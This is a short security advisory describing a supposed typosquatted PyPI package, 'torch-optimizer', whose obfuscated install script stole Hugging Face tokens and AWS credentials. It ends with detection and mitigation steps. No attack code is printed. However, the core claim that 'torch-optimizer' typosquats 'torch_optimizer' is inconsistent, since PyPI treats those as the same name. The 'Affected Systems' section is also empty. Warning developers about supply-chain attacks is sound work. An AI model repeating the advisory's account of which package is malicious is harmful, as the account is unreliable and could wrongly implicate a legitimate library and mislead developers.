Malicious PyPI Package 'torch-optimizer' Steals Hugging Face API Tokens and AWS Credentials
Overview
A malicious package named `torch-optimizer` was discovered on the Python Package Index (PyPI). The package was a typosquat of the legitimate `torch_optimizer` library, targeting AI/ML developers. The malicious package contained a `setup.py` script that executed upon installation (`pip install torch-optimizer`). This script was heavily obfuscated but contained functionality to scan the user's home directory and environment variables for sensitive credentials. Specifically, it searched for `HUGGING_FACE_HUB_TOKEN`, `AWS_ACCESS_KEY_ID`, and `AWS_SECRET_ACCESS_KEY`. If found, these credentials were Base64 encoded and exfiltrated via a DNS query or a direct HTTPS POST request to an attacker-controlled server. The compromise of these credentials allows attackers to access and steal private models and datasets from Hugging Face, as well as take over AWS infrastructure, leading to significant financial loss and intellectual property theft. The package mimicked the functionality of the original library to avoid immediate suspicion, meaning developers could have installed it and used it in their projects without noticing the background data theft. This incident underscores the growing threat of supply chain attacks targeting the AI development ecosystem, where access to specialized credentials and compute resources is highly valuable.
Affected Systems
Testing Guide
1. Check your installed packages for the malicious library: `pip list | grep torch-optimizer`. 2. If found, assume credentials have been compromised. 3. For future prevention, download the package source (`.tar.gz`) without installing it and inspect the `setup.py` file for suspicious code, such as network requests, file system access outside the project directory, or use of `eval`/`exec`.
Mitigation Steps
1. **Remove the Package:** Immediately uninstall the malicious package using `pip uninstall torch-optimizer`. 2. **Rotate Credentials:** Revoke and rotate all potentially compromised credentials, including Hugging Face tokens and AWS access keys. 3. **Use Dependency Scanning:** Integrate tools like `pip-audit` or commercial solutions into CI/CD pipelines to detect malicious or vulnerable dependencies. 4. **Pin Dependencies:** Use a dependency lock file (e.g., `requirements.txt` or `poetry.lock`) with pinned, hashed versions to prevent accidental installation of malicious packages. 5. **Vet Dependencies:** Before adding a new dependency, verify its authenticity by checking its download statistics, repository link, and author on PyPI.
Patch Details
The malicious package `torch-optimizer` was removed from the PyPI registry on 2025-07-23.